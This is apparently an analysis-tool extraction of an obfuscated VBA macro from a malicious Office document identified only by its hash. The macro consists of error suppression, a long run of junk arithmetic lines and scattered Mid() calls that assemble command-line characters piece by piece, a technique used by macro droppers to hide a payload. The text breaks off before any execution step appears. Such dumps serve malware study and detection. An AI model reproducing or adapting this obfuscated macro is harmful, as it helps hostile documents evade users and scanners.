Filename     : ./macros/f8b563cf916bfa94d42076e3fc2ab0a59cd1bfa9974311fab8868db35a0f92ab
OLE stream   : Macros/VBA/twtNTTz
VBA filename : twtNTTz.bas
----------------------------------------
Attribute VB_Name = "twtNTTz"
Function XZzQZKBrmBdS()
On Error Resume Next
DQEZkTrHqm = 871 / Rnd(4) + CfjIzmI + VSMiKjkSS * 9 + Int(YzOIaZEDUvIPvJ * CStr(nSqZCtKjbJJiJ)) + fuMLkBJltFGE * CDate(3624 - 352183467 * 84 / 475) / SMHGWCnXOtsPCO - CSng(620)
bBHnkKkYjP = 871 / Rnd(4) + uKDEMtP + vtWnRwNlFHW * 9 + Int(AGqhzBASjDOvvi * CStr(BGZdpUrGoBRsAj)) + nscjAoUWGLt * CDate(3624 - 352183467 * 84 / 475) / rrfbrnzMifdhZJ - CSng(620)
whCBXwI = Mid("VkNnGmV kXP", 8, 1)
rMpQzsz = 871 / Rnd(4) + nwRvvQoBv + KIjBYlT * 9 + Int(zrWTDmcVPQBUwi * CStr(twvoLIfdLMCLu)) + VqIZQFWt * CDate(3624 - 352183467 * 84 / 475) / uiSZBXAbHc - CSng(620)
kJiHYBXf = 871 / Rnd(4) + IBVFsIucNhbEn + SQFGHXXI * 9 + Int(EShVhsj * CStr(ETAzjroKcQ)) + jaFYMvUIXjG * CDate(3624 - 352183467 * 84 / 475) / QzwQmKnNjiIX - CSng(620)
wHkkj = 871 / Rnd(4) + mDdwHqROLG + bhOuasu * 9 + Int(cRAiAKsiiFK * CStr(viZURMLSaoIh)) + uDlLHzHjc * CDate(3624 - 352183467 * 84 / 475) / EmZdmOH - CSng(620)
mZJwbirMFkf = Mid("FjWUriHDEw hVifaPzwn", 11, 1)
vfcRMWnCsw = 871 / Rnd(4) + nJlZRvfGsZcz + VZMkMswikAiaBA * 9 + Int(DvFRhmZljjFka * CStr(YaVRspNAzRQ)) + CCJCwPvrDz * CDate(3624 - 352183467 * 84 / 475) / LRIvodAGIX - CSng(620)
uDtQq = 871 / Rnd(4) + wcrGmhtrvkE + YYbwpLWOa * 9 + Int(vpNSEQkfjTOW * CStr(DTClqSE)) + fOUGMrFUNu * CDate(3624 - 352183467 * 84 / 475) / ENhCtUccHQElE - CSng(620)
zLcBAsik = 871 / Rnd(4) + MZNJJLa + vnAIjXc * 9 + Int(kqojZaGJzkuZ * CStr(wLIBzqjopF)) + QBCfLJYXLwQP * CDate(3624 - 352183467 * 84 / 475) / oflSEJZQB - CSng(620)
KbdocJbk = Mid("OlNojjRPVuUjjKvKHtvzSmusXmFwRTpwSjZPDqa", 31, 2)
TcOmfBBnB = 871 / Rnd(4) + SXfnZfv + OQasLrZfLS * 9 + Int(bRsWQJRNqz * CStr(adPEtTa)) + oPrjwRcAJlCb * CDate(3624 - 352183467 * 84 / 475) / mMdlaBO - CSng(620)
dIlsJwjM = 871 / Rnd(4) + wMwWEdJlGoq + XjNrPmVljjGVJd * 9 + Int(wjOIJdAJqzh * CStr(TQitAbDoUSw)) + sRHrSFbMbC * CDate(3624 - 352183467 * 84 / 475) / FrjjUWXX - CSng(620)
vRzQOzKcGd = 871 / Rnd(4) + ISFXKpzcGzF + iiJjhtF * 9 + Int(JIcnVwoQmTTSL * CStr(fwmLobi)) + CnzXbHCuDj * CDate(3624 - 352183467 * 84 / 475) / aUzpRBLAjqnint - CSng(620)
BvmvH = Mid("ptbzzMGzKdzHutcTwVqIZSVD", 18, 1)
lzKPzzkkr = 871 / Rnd(4) + iKCUAmGuGoGjhr + sWIrkWUAQ * 9 + Int(cCUuiRz * CStr(FpiPnrfzjGmviX)) + PowOfnX * CDate(3624 - 352183467 * 84 / 475) / JlPXklzYX - CSng(620)
WjTMhLvHLMi = 871 / Rnd(4) + uTGwEAacMj + LintuuP * 9 + Int(WXMFzBj * CStr(UziHIiIzVN)) + ZtAhmazGnVmDn * CDate(3624 - 352183467 * 84 / 475) / JhAhNIzYc - CSng(620)
bYpscrM = 871 / Rnd(4) + lcCiciRM + pONUaFCFFjDR * 9 + Int(iaYdYTuO * CStr(iPmtvzhLQwTC)) + AwRoSijtoUri * CDate(3624 - 352183467 * 84 / 475) / bKzKwSWIfwihJE - CSng(620)
czbKPG = Mid("bbNLKlqCwoEwKvEDNcHXtGEzlAqHkRUljrjsS", 6, 2)
tDtQamCzl = 871 / Rnd(4) + idcshZn + hBpHWpZfAu * 9 + Int(DhuvpzzHRHEwB * CStr(uDJzFZOhO)) + mcBLLIiICf * CDate(3624 - 352183467 * 84 / 475) / YjinskRVQc - CSng(620)
EGFtHlY = 871 / Rnd(4) + bYlCWSXhLVo + IBiSrbAFN * 9 + Int(WOdIBdhBSv * CStr(jwCJvwtUwzwI)) + JopOoGIQRFCWY * CDate(3624 - 352183467 * 84 / 475) / QtAKCtibD - CSng(620)
OwLHVcYY = 871 / Rnd(4) + opblQhu + iVTYIMzlwJ * 9 + Int(vtWsWTaJNp * CStr(MzthoMjZrBOhAE)) + LZbuwVL * CDate(3624 - 352183467 * 84 / 475) / jLRzFRpXhfiIW - CSng(620)
MQwqBQsoH = Mid("bIDIqIvYbBFPbwTwYmvCozcCwVPX BjUz", 29, 1)
jwAUdstS = 871 / Rnd(4) + IvcGkOWZFpz + oSMLnSPs * 9 + Int(nXkdawp * CStr(PGhlJFtiBjDjcQ)) + PDFhzqGQMKfV * CDate(3624 - 352183467 * 84 / 475) / sdJPjfqjRb - CSng(620)
HDnOXX = 871 / Rnd(4) + awmXzuw + tpLUYVmkP * 9 + Int(iqOUuHAbZs * CStr(NHOcwhBzwGtA)) + jqhbcfqMjsh * CDate(3624 - 352183467 * 84 / 475) / rGCfXWVEffhz - CSng(620)
cwPULmju = 871 / Rnd(4) + MShlmLIXXnV + VRrCJpVadk * 9 + Int(mYWoCwaAzc * CStr(UiJUiACHwkW)) + ozocjtw * CDate(3624 - 352183467 * 84 / 475) / BczvNPX - CSng(620)
lPzaIXrJ = Mid("pLTdYOQuAtQs JIrUwtdEr", 13, 1)
wLcjB = 871 / Rnd(4) + cokmQOopmkDZZ + uBUhOjvEazSbkY * 9 + Int(vDIkkAqGaQisrF * CStr(wGzWaDLwTQ)) + XOkUodQtqhuopz * CDate(3624 - 352183467 * 84 / 475) / vuRjoEz - CSng(620)
wPOILI = 871 / Rnd(4) + lSXGswESkzR + JzJLzzHBvhcs * 9 + Int(QlotoNo * CStr(sPmFzbESJpr)) + zCIaFzzNof * CDate(3624 - 352183467 * 84 / 475) / qfFcKPZ - CSng(620)
FXjAD = 871 / Rnd(4) + AMiNzsk + pUoccVF * 9 + Int(BcwPoERIXWH * CStr(hjcrYJkIK)) + TAFcFUBWb * CDate(3624 - 352183467 * 84 / 475) / opiLFjQwuVp - CSng(620)
jslNAh = Mid("JIpHPVoapm FYqddVNzzHGMFdvRB", 11, 1)
DEKAQ = 871 / Rnd(4) + kdKQiWFzVCjlrl + DNdOorPamN * 9 + Int(wauzuCkt * CStr(tnmZDzzc)) + FtNEJCOj * CDate(3624 - 352183467 * 84 / 475) / lEUCYCX - CSng(620)
KilGE = 871 / Rnd(4) + hTiFwlKCiEE + BczFdTItpH * 9 + Int(zlwaKbHzajG * CStr(NfIpJUzdojcpZ)) + OZOEOmanlTzK * CDate(3624 - 352183467 * 84 / 475) / aWFdovk - CSng(620)
vYcJR = 871 / Rnd(4) + fFWIjBzfbP + DKounPjUzsQ * 9 + Int(kNBzpmrPjCiUr * CStr(CYsPZim)) + cqwKhnriZhONm * CDate(3624 - 352183467 * 84 / 475) / fCIskAqBjUChMI - CSng(620)
CYPtKwjKF = Mid("wApkTsWhmZzkoGROcHQujztRhZdzbGCNb", 31, 1)
jLUpjACGdB = 871 / Rnd(4) + ZVdzYqirQJHB + NilWUTRZuoq * 9 + Int(UYGjCntozoDkEp * CStr(vvUKrIZNnTHUbS)) + fjnAERXI * CDate(3624 - 352183467 * 84 / 475) / VNMbYfBRi - CSng(620)
wRVQfvhtCGb = 871 / Rnd(4) + YKETHscXT + nmiFMbAMbzKAol * 9 + Int(VRKluuNZj * CStr(bKowVPVdw)) + BlnluKlifEYV * CDate(3624 - 352183467 * 84 / 475) / FlaSmZzaN - CSng(620)
lkfqsfCjQJI = 871 / Rnd(4) + ViadwpvKSP + TSVpJWwDliYnGp * 9 + Int(wzpIRpqDzfF * CStr(pLIGEsS)) + vqlOIFO * CDate(3624 - 352183467 * 84 / 475) / tzrUoUtzVKwFc - CSng(620)
YtpDjHkGSnj = Mid("ZdOqnbLuzRmc  ml", 12, 3)
ouUqijCEHf = 871 / Rnd(4) + nlQLOFh + WsEMkdZrkIitb * 9 + Int(FriMvzjEwGoiAA * CStr(wXYwQCdOtBw)) + voqrTaufYcCKj * CDate(3624 - 352183467 * 84 / 475) / RvwXBdY - CSng(620)
VBIjHlX = 871 / Rnd(4) + RwhAHuNUK + kGNAiwrDRKi * 9 + Int(BjtishRFvQZ * CStr(okqPvJhTjhuK)) + pAHCTlwinvwGZ * CDate(3624 - 352183467 * 84 / 475) / jCEjThb - CSng(620)
wUmuwfhiZ = 871 / Rnd(4) + mlKvLrcdp + wEnPFPUH * 9 + Int(VFVUNOL * CStr(iQVzTUhCFhYP)) + DvnrMfR * CDate(3624 - 352183467 * 84 / 475) / piDuXDI - CSng(620)
OiXMAupFENH = Mid("GDWlvkoadSkChbaRWWK", 13, 1)
cfDIYOG = 871 / Rnd(4) + zFcIIcOw + oitCjKDcia * 9 + Int(ApsIWHB * CStr(bwadMcDBZ)) + dWTrbJXf * CDate(3624 - 352183467 * 84 / 475) / zrBGoGYMHMTmBa - CSng(620)
tXtzzHfV = 871 / Rnd(4) + nStjirCB + WzNCLYdiVzbbTl * 9 + Int(PpNAzNr * CStr(PkpPCKujscd)) + wviIzOqn * CDate(3624 - 352183467 * 84 / 475) / MhUhpTpdC - CSng(620)
TaoUCk = 871 / Rnd(4) + UVNEhZcJdQBEjJ + jlqIBZarl * 9 + Int(nQvpGYbvVW * CStr(vSzZWiX)) + nBpCtdivtZYud * CDate(3624 - 352183467 * 84 / 475) / huJhUXrZJNn - CSng(620)
wzPWH = Mid("FVKhEVNfvubuuz^zuGlrBLBFSqZzQvGKLmqzzQK", 15, 1)
PFUTDJ = 871 / Rnd(4) + kiVwSWJ + YbRjzqaGULF * 9 + Int(jWEMDDV * CStr(MqFCpYsjbzMl)) + nRMzchiHizdYA * CDate(3624 - 352183467 * 84 / 475) / NaIuOAbOiW - CSng(620)
iifzmHZwBzN = 871 / Rnd(4) + KNbPwZzfW + YiEbOotuzf * 9 + Int(OapHdVtBnfNd * CStr(wmJawMFtwPp)) + wHiicHjLivnl * CDate(3624 - 352183467 * 84 / 475) / SDFdisKE - CSng(620)
wACOJLYcuoc = 871 / Rnd(4) + tbztfWwTL + FrOaWradrbdoDi * 9 + Int(SCzlOYj * CStr(ijFjNCciEpYIi)) + UsJAkqvlEYSnNU * CDate(3624 - 352183467 * 84 / 475) / iwXVCjq - CSng(620)
rLqinHhs = Mid("CsKoCEVjuABAUQwhEDqzidNKAIVSiJr", 8, 1)
awuTiuzXGB = 871 / Rnd(4) + cbiSvlaoSKz + hOLSLXiStC * 9 + Int(XSfIzPNXfhTiGD * CStr(Mwkudcmm)) + ouLXUfmjZbHz * CDate(3624 - 352183467 * 84 / 475) / cbZEnUnNk - CSng(620)
zoGZzcCw = 871 / Rnd(4) + QNIVuArAEa + qaNlzLEwHuY * 9 + Int(ddsoiFAWC * CStr(zrJMspVAdbzs)) + pznindX * CDate(3624 - 352183467 * 84 / 475) / cszirCLMuDD - CSng(620)
ppwkSURhkN = 871 / Rnd(4) + OBLjizZ + ljuUEEqDzv * 9 + Int(EiwKwVIUZpRz * CStr(DqwVIzDjAE)) + TVIXUNkVsd * CDate(3624 - 352183467 * 84 / 475) / ZSrPKZiziTh - CSng(620)
AOdiOUG = Mid("IGbbjWMNwWTDJzlrqfRzl   GvDKbBHMSFUwq", 22, 3)
GuqcW = 871 / Rnd(4) + DaVcnTPbGR + RlcDqraMtfMXzM * 9 + Int(AnJniXvVzObK * CStr(UOvTLvfsPzVVT)) + KrrDWQETbSTiY * CDate(3624 - 352183467 * 84 / 475) / QfoPjjsijt - CSng(620)
pMKcwIhA = 871 / Rnd(4) + lKXSwzwHi + qKjvBnFnBE * 9 + Int(mLBhKvYq * CStr(hQRLYcYZ)) + GvbBAXqwmbqcQU * CDate(3624 - 352183467 * 84 / 475) / KzwWlnE - CSng(620)
iRcYEQ = 871 / Rnd(4) + DjplnoRO + kdFKFumAmdzc * 9 + Int(IcjKFokwfH * CStr(rTjOindBUslmZd)) + mwssGtjj * CDate(3624 - 352183467 * 84 / 475) / NBdiddiEWH - CSng(620)
BZmXKOUOTOB = Mid("huWHMwMBzAOKLvkTiwJNGSUfIsmsUYzqIJqoizzMrB", 35, 3)
PMsSpSWdq = 871 / Rnd(4) + RVpZtVXZOjt + JjkKiqOJwAjQvO * 9 + Int(YdCoFCV * CStr(jLzzaPBb)) + WZtdOnsuZvdQoZ * CDate(3624 - 352183467 * 84 / 475) / iUwwMrotoWE - CSng(620)
TdNRiABP = 871 / Rnd(4) + HbuIfwaw + EYrjZVUuhpG * 9 + Int(GNjnYZH * CStr(QYBszXj)) + GkAaBPphRWNkoO * CDate(3624 - 352183467 * 84 / 475) / mrHANOVGZTr - CSng(620)
AwBNOKkuMq = 871 / Rnd(4) + jsntvZktVUXJpJ + jGrurlSSGQEOFi * 9 + Int(FHKoLCmBirEj * CStr(JzoHCwHm)) + bMNOZhdqKiKoPP * CDate(3624 - 352183467 * 84 / 475) / AwruFJDnFJJIbz - CSng(620)
pGBicwtzc = Mid("iopjLKGLmGmXwvJjoPtSzVzQ&PzluNwjtmsoRbH", 25, 1)
XcqHMJBS = 871 / Rnd(4) + fXzhBmbn + pjCrYzVCLXRBzP * 9 + Int(rXVfldb * CStr(KDJKSpLw)) + bdwKFJpO * CDate(3624 - 352183467 * 84 / 475) / ENvaJiHwpiQvBU - CSng(620)
jNBcCtbSVH = 871 / Rnd(4) + HtnmjMSrn + LjEXtFr * 9 + Int(jzpOKNMMvRwmJ * CStr(iXGbnmNjw)) + ijBFCjWdnbP * CDate(3624 - 352183467 * 84 / 475) / YsjZZWQ - CSng(620)
twbVwaYE = 871 / Rnd(4) + ZrnOpDMzZ + aUSqlOj * 9 + Int(lYNLktbCU * CStr(hhRZIil)) + VaZwsOWVj * CDate(3624 - 352183467 * 84 / 475) / pHEPjiQvA - CSng(620)
NESwohj = Mid("rZwhGqWwROiowKn", 3, 2)
HFzflHoN = 871 / Rnd(4) + tAqwBhR + SEczCKjaL * 9 + Int(JPvUwizj * CStr(NrOMqQvkhsDEVP)) + LjzPwNM * CDate(3624 - 352183467 * 84 / 475) / NSNAFZCI - CSng(620)
PwKzi = 871 / Rnd(4) + TwFSBoLCY + CqzmHvdDOb * 9 + Int(sKjzpInDsELaZv * CStr(wzXMDNODQwA)) + jIUFFpSan * CDate(3624 - 352183467 * 84 / 475) / VLfYzfRqQX - CSng(620)
rrVfW = 871 / Rnd(4) + UiDaEsl + HawiICoAqJPj * 9 + Int(hlAiAtcPqLfj * CStr(jmLiGqN)) + rnOaEQYAOPm * CDate(3624 - 352183467 * 84 / 475) / SmzCrDwJUR - CSng(620)
zKqRvbjURc = Mid("XmTrHjsAHIZkzKsRYHwhmkQv", 22, 1)
YWqfoz = 871 / Rnd(4) + fwfjCYiiGTBps + vXwFkHU * 9 + Int(dcLjiOimZfcZE * CStr(oYDRjvhC)) + WnVEISlfQW * CDate(3624 - 352183467 * 84 / 475) / TDUVtUwUuVMSw - CSng(620)
RBIoZ = 871 / Rnd(4) + fwpXGoE + LCdJElcbWPR * 9 + Int(XnamACwVVaAh * CStr(KEtIwNGEzjQf)) + UBMZEpWkir * CDate(3624 - 352183467 * 84 / 475) / CXEriGlBwc - CSng(620)
AjcNMF = 871 / Rnd(4) + jaCTXYHaIotJ + ZToAMDOr * 9 + Int(DiYOzMIwJUWU * CStr(sjMszisvfb)) + KWBFVAPkrzWT * CDate(3624 - 352183467 * 84 / 475) / IZuSJfZnpAaFnT - CSng(620)
whKBPtNH = Mid("kIvzbS^pUhlbqqzSMqFFQVhPp", 6, 3)
srtSHiX = 871 / Rnd(4) + jjSYCLiaEKHfhv + vVKLwbNU * 9 + Int(bIPWqzO * CStr(taUcHjnLFHnN)) + rXvZKPqlfSTONw * CDate(3624 - 352183467 * 84 / 475) / vIkGwYlGajopXA - CSng(620)
rOiRiR = 871 / Rnd(4) + nlSIsvhRvaaT + AuBBSQkmcHvPU * 9 + Int(zpSMEkrzI * CStr(kwqvEDdipNL)) + IFnZlzKdWsX * CDate(3624 - 352183467 * 84 / 475) / ibcNViwDlWQ - CSng(620)
GzlhVsFpznf = 871 / Rnd(4) + UZHJjlTwfiXzN + BNtjtPzX * 9 + Int(RXGQUsWZTlow * CStr(HDNIbLFYYbYzZS)) + GdkuwspmdVwDJI * CDate(3624 - 352183467 * 84 / 475) / LYJGFqV - CSng(620)
BGbQrAwCT = Mid("hnMhHRwDBrhVu", 11, 1)
pGPHEiQYXl = 871 / Rnd(4) + apiYiNaHEV + NZfzsmfIrYKM * 9 + Int(bPMGPHsloSz * CStr(QlzJRQcNuOoqjF)) + GOZwPcFzO * CDate(3624 - 352183467 * 84 / 475) / UrwcvYG - CSng(620)
YALrvm = 871 / Rnd(4) + MpfZLIQhCqnEzd + qZtbjvM * 9 + Int(NFfYXEiOoMtSHC * CStr(jPtEurdGzNbt)) + VHqzzrSTfks * CDate(3624 - 352183467 * 84 / 475) / YcwrELsntML - CSng(620)
MztBLlKm = 871 / Rnd(4) + CbAjzZIiziNb + WJqlXPVjUL * 9 + Int(kIzYfkzphJjiR * CStr(PzohdXknizi)) + rXJlwiQ * CDate(3624 - 352183467 * 84 / 475) / vrcjCOiX - CSng(620)
hoftzdwLmw = Mid("BwnOPzcfniIzGtTvqFUfCvz", 2, 2)
NGUCw = 871 / Rnd(4) + rSGkzhKvLBshW + SQkNAfAcWPiOsC * 9 + Int(GjIvDGhkhUwZ * CStr(RWjRVJtcCjMjmP)) + rGkoIMFSjlSpkf * CDate(3624 - 352183467 * 84 / 475) / tCFDLzf - CSng(620)
QPwBazjSvRc = 871 / Rnd(4) + sETiKpMIAWJL + dRmRFAfLAp * 9 + Int(wwwBhVKJDtRoVn * CStr(GTYqtrzjnUCPi)) + CXrPVhOqKbiLA * CDate(3624 - 352183467 * 84 / 475) / iMdRdRtM - CSng(620)
sSwZzu = 871 / Rnd(4) + tjJGDDwPQ + ltbjJRkMEzfCU * 9 + Int(zzmKajEw * CStr(trFwFBOn)) + CzwlbJsoSw * CDate(3624 - 352183467 * 84 / 475) / fhqPAJEQmojnph - CSng(620)
dSIRbSEwJzY = Mid("IQvVmUwZEBKEVimrIiQlLom^mfCYw", 22, 3)
CMIFzYLLi = 871 / Rnd(4) + KvGzPLhiFcTB + ZZzFZPIzMh * 9 + Int(oCarlmRvpkhTO * CStr(wfdwYjjGImDR)) + riDpwNPKNk * CDate(3624 - 352183467 * 84 / 475) / tTLYLlrFlXakf - CSng(620)
CbiVRBHo = 871 / Rnd(4) + ptuRwkdzmB + hmztAbEjrc * 9 + Int(DpzDNmrcjLkjK * CStr(FXrGTinzRoGru)) + hTiNwApEU * CDate(3624 - 352183467 * 84 / 475) / XrHJSKwCmAuDMZ - CSng(620)
MsAhHwMWBJw = 871 / Rnd(4) + nwKitnn + OZRmujFwXl * 9 + Int(nDFYIuXuwjAQtX * CStr(KPFcTwCZFlGZq)) + AmApprzi * CDate(3624 - 352183467 * 84 / 475) / BnWspnNIXOF - CSng(620)
TiwAvoWqEi = Mid("CXFRjSdDpWzqwXPCFjDVzLqwcqOI GKCblW", 27, 3)
MtPlKj = 871 / Rnd(4) + tCDXIzVsiv + cWnKCBDzj * 9 + Int(bdhHsDEtSdG * CStr(pCwmhLwB)) + cODhZPcztAPpvS * CDate(3624 - 352183467 * 84 / 475) / WPQtRwLRJT - CSng(620)
ScHplsLbVO = 871 / Rnd(4) + RjMZJLOBUbLc + QXbzzvziJ * 9 + Int(MGcdjVMSJom * CStr(IcXwdokTqpJlW)) + bwzCfCHIATj * CDate(3624 - 352183467 * 84 / 475) / ifHJBodXPzZB - CSng(620)
rGLcpSYuw = 871 / Rnd(4) + lMQUrAidwOda + ocvZdqTuj * 9 + Int(PRvDkAQztN * CStr(iQhYIPHRUJspz)) + pDmnSAm * CDate(3624 - 352183467 * 84 / 475) / mADwzzd - CSng(620)
KnGduF = Mid("mJkwrwwmAzWwTFaGm fhUYKcLzaSMRQhsGfrzpvS", 18, 3)
cnsPjCdd = 871 / Rnd(4) + ItqlXwrHD + NSHIjlAcEPvGFL * 9 + Int(nVIzOcZwlXJR * CStr(cWpailuruf)) + lOWVmWCoiEjbjI * CDate(3624 - 352183467 * 84 / 475) / RoTVlaUdziZUb - CSng(620)
nJkjBcDvD = 871 / Rnd(4) + DJkXAIU + RcOkaRAsw * 9 + Int(VBvVnazbdUHuX * CStr(HHCdifl)) + rDDVjLoRQHOFi * CDate(3624 - 352183467 * 84 / 475) / HiWKXZiAHX - CSng(620)
DNKVDTTLdiD = 871 / Rnd(4) + RptqONzFDM + UUmStvGSp * 9 + Int(FXYtTRlXnM * CStr(aUMOqlV)) + pLkHHRFhLGnTCl * CDate(3624 - 352183467 * 84 / 475) / LSUzuvOiQANtzZ - CSng(620)
fIEBwOi = Mid("EehiQNDmazbXNWvvb", 2, 3)
sJrJnQw = 871 / Rnd(4) + IcSOXJT + dJsRSuo * 9 + Int(MDzfSaizUHYHM * CStr(qvjQXiVC)) + wvBAOPQDQjmSw * CDate(3624 - 352183467 * 84 / 475) / rmhtTtPl - CSng(620)
RsaEAzfKN = 871 / Rnd(4) + AjoBGqYSY + NtFkHhj * 9 + Int(iOTTRkws * CStr(VHjbONEJ)) + RFORBPR * CDate(3624 - 352183467 * 84 / 475) / PtLnScMR - CSng(620)
DvBpLSK = 871 / Rnd(4) + rRTzlCWF + JKBkQZTkE * 9 + Int(IYattnp * CStr(qoCJdNjJjvR)) + AuiUJmGGVHa * CDate(3624 - 352183467 * 84 / 475) / pLdnRXZKvZjQ - CSng(620)
MsUmLYzR = Mid("ctisjJoAE /GtHqNpZ", 10, 2)
jGRTzoDUwM = 871 / Rnd(4) + BwjPEEOiCLpczj + aBPisQN * 9 + Int(CJUDhYD * CStr(XJQMIcqMAAn)) + EcfPNKNQMiYhos * CDate(3624 - 352183467 * 84 / 475) / GjAjFwjRTjU - CSng(620)
mARBwGh = 871 / Rnd(4) + jEiwWtHz + JmoJjifwrQckb * 9 + Int(IMSoLDMG * CStr(bGuiVAEFUanOIZ)) + jmvBMfHXH * CDate(3624 - 352183467 * 84 / 475) / VkEFwvcDnMDmAJ - CSng(620)
qbLSOVUG = 871 / Rnd(4) + zLCdrcOzadFqW + nRokiXQw * 9 + Int(dzUhAYKMftSP * CStr(JFjEatE)) + dKKuLOdiAwb * CDate(3624 - 352183467 * 84 / 475) / bZdXvOaPRazDvj - CSng(620)
HEXNMSGYG = Mid("iXahSricSNvmSzcJOUmQSacacLRcfIj", 12, 1)
VYtiKLDiPaf = 871 / Rnd(4) + mKHJnuAnBFYILt + UimjAPAAYi * 9 + Int(KVMOwmlE * CStr(UzOTAVzDzXn)) + JTsUzRIjl * CDate(3624 - 352183467 * 84 / 475) / jickiamI - CSng(620)
iWfOWjtCiz = 871 / Rnd(4) + jJPbjLhzuQnwKA + hwHhNPY * 9 + Int(UWcLjROEOqR * CStr(wSLAXvJw)) + duXdkXpUlZjIdv * CDate(3624 - 352183467 * 84 / 475) / GzBffMY - CSng(620)
bWczfjVv = 871 / Rnd(4) + WGTzVUTjiSzB + rtBCUuz * 9 + Int(dYoLQjqQqW * CStr(rlQKpUWzj)) + iNoIinjicGsL * CDate(3624 - 352183467 * 84 / 475) / tiinFlcTn - CSng(620)
wYPHIz = Mid("tEKnIlCpkwOfZHubqNoCodbTVbttD  jf", 30, 2)
ENqUmrnwQz = 871 / Rnd(4) + stEPkHKS + ZlqbEivu * 9 + Int(jdQkwVWHtX * CStr(dTiFmijjHENbGZ)) + rFcCRFlFcurI * CDate(3624 - 352183467 * 84 / 475) / isdNnZdGDlpZwP - CSng(620)
QQWJWpuKCi = 871 / Rnd(4) + FzLkptsZKZb + miGitOiHHwmsO * 9 + Int(JjdAXkQ * CStr(IiCBAEwpbYRmL)) + HrPfIVWJKTVoj * CDate(3624 - 352183467 * 84 / 475) / wJCravVb - CSng(620)
iqsbVQFOhDO = 871 / Rnd(4) + UVCJLPdRirFo + NFKvWowObAnhw * 9 + Int(nTncTqwkHsh * CStr(fEbwWhklswauCJ)) + XtVObOmqz * CDate(3624 - 352183467 * 84 / 475) / OlwtdzRNZItnd - CSng(620)
wflkKc = Mid("BvXRbfba   lrFCdKwFaaKzuiilzKWpuZDz", 9, 3)
wMNawttEkKa = 871 / Rnd(4) + sNZISUOacpV + llsbuUwTjf * 9 + Int(UmsRWaLQ * CStr(fLWRiNEpw)) + tzOmKYKPjaWHv * CDate(3624 - 352183467 * 84 / 475) / BFWZCrzR - CSng(620)
RtYlTVRp = 871 / Rnd(4) + mwHzicof + hmKjciTocZF * 9 + Int(rAWaGZHIbpSIP * CStr(CPtbCAH)) + bjAUhkW * CDate(3624 - 352183467 * 84 / 475) / utrWuvkXcDjWDr - CSng(620)
XiITsdii = 871 / Rnd(4) + EtaOashPJW + mNGzitMLipuXP * 9 + Int(QdqfmEtb * CStr(JskKjXzLNkF)) + nwWqJfomiJV * CDate(3624 - 352183467 * 84 / 475) / EKPqjXSw - CSng(620)
TcfDji = Mid("FCNQEc%PRvik TnoNrrPiRP", 5, 3)
rOjcaHkzj = 871 / Rnd(4) + BTbcEvBWEh + YnalsXljvZQtG * 9 + Int(fVwzUkBk * CStr(wBFISztXm)) + HWwzrLIkXwuka * CDate(3624 - 352183467 * 84 / 475) / VYaCWkwloY - CSng(620)
XqnvtE = 871 / Rnd(4) + NBEXuRc + OjSHwWSrjjqiMu * 9 + Int(iAuTIOTIcHHo * CStr(VjQkAONVst)) + swqEJlc * CDate(3624 - 352183467 * 84 / 475) / SSZWAwThvXpAp - CSng(620)
OPFCNdTqh = 871 / Rnd(4) + kmOTjBCiDwj + XHoLzinUNakn * 9 + Int(ZqABtWhXWGYtRq * CStr(sGXXlpCviZwHBE)) + KCbZGLBcK * CDate(3624 - 352183467 * 84 / 475) / CLBAPRinsbG - CSng(620)
NBULafz = Mid("wuGCnEhDVmd qqjwiC", 10, 3)
obqRw = 871 / Rnd(4) + sWzSGdwhNmGq + JYPzriRWHwN * 9 + Int(ljjRwCtOK * CStr(UEqfwrk)) + nPKYKJf * CDate(3624 - 352183467 * 84 / 475) / wVYLkamCVw - CSng(620)
DzcXIhzH = 871 / Rnd(4) + BRNEwXDPRRL + jrZncdrBb * 9 + Int(pAYNwsZvauj * CStr(zIUNrYEL)) + NdNFuquhPdA * CDate(3624 - 352183467 * 84 / 475) / XbNjiaK - CSng(620)
FAVRNbI = 871 / Rnd(4) + QPjNbPDEL + MjZlCIwG * 9 + Int(WWlaDYqz * CStr(tRoKBYUpDC)) + JHFUPmpwZiRn * CDate(3624 - 352183467 * 84 / 475) / IavipfolQhKtUC - CSng(620)
vbLSfuR = Mid("hLHGXvZNXqDiWZBRPdptsGmNLX", 18, 2)
tiTwPDW = 871 / Rnd(4) + WqQiYtRSPmSzQ + cWKICCfNKRjIZj * 9 + Int(jIztVHXN * CStr(jAYbSdKDmYw)) + VaYHKIfzwQUlL * CDate(3624 - 352183467 * 84 / 475) / dUDurFJibCiD - CSng(620)
pPMboBhC = 871 / Rnd(4) + uiIpfls + AmSDRalRzPMCM * 9 + Int(JiHUaipIHSzbX * CStr(UiJwbvDVmhbucD)) + UIKtCZihK * CDate(3624 - 352183467 * 84 / 475) / KzrizFqD - CSng(620)
riKoiJ = 871 / Rnd(4) + hHjVAhQLiZlLwr + hQjnQkApz * 9 + Int(hthqzWdGNwsSu * CStr(DvXvvRjsO)) + zLWrnKjRjdToiU * CDate(3624 - 352183467 * 84 / 475) / DIFktVOVNjVN - CSng(620)
WdLuUvL = Mid("CkzzwbZsLiQmiDitNBCp   KEvwBiPYELs", 21, 3)
RjYuUflHj = 871 / Rnd(4) + wVFPaQonrZtfF + vmKmiUYpwwlR * 9 + Int(MqmbkrpGrOtjcO * CStr(nIQfELvrpTIi)) + HZHiJTbwE * CDate(3624 - 352183467 * 84 / 475) / IoQfEYQDGGnCnh - CSng(620)
mVDfbUPrSqD = 871 / Rnd(4) + sZhwujirib + rbUbLwBEDXn * 9 + Int(IilHzJW * CStr(jSjwHzslGiK)) + WqGrJwCcDWcAFU * CDate(3624 - 352183467 * 84 / 475) / TIYjhHwsZs - CSng(620)
AFVUXJN = 871 / Rnd(4) + NlRwzIb + azRHPaIm * 9 + Int(iKIrnjqTZPCbb * CStr(lZYwhKz)) + pjfqfmQB * CDate(3624 - 352183467 * 84 / 475) / zTzTdZOZFaf - CSng(620)
uqFcRb = Mid("huSPXikMjFvoiwDAtlBqdwbkkSL", 12, 3)
pqaHzzXiw = 871 / Rnd(4) + TNEQzVNoiR + uwAGtYNqir * 9 + Int(YYciwcqXwhzkf * CStr(YnYHmQlIwOZja)) + ZiiJhjpfn * CDate(3624 - 352183467 * 84 / 475) / WkzLTquOU - CSng(620)
VQkAz = 871 / Rnd(4) + UbpbBdSwMpNOBs + QDIBUzCwjiJFr * 9 + Int(EVtdNBqmJfUb * CStr(PmJjwIAT)) + VzHzRiJ * CDate(3624 - 352183467 * 84 / 475) / rXbNHTTlnrBitc - CSng(620)
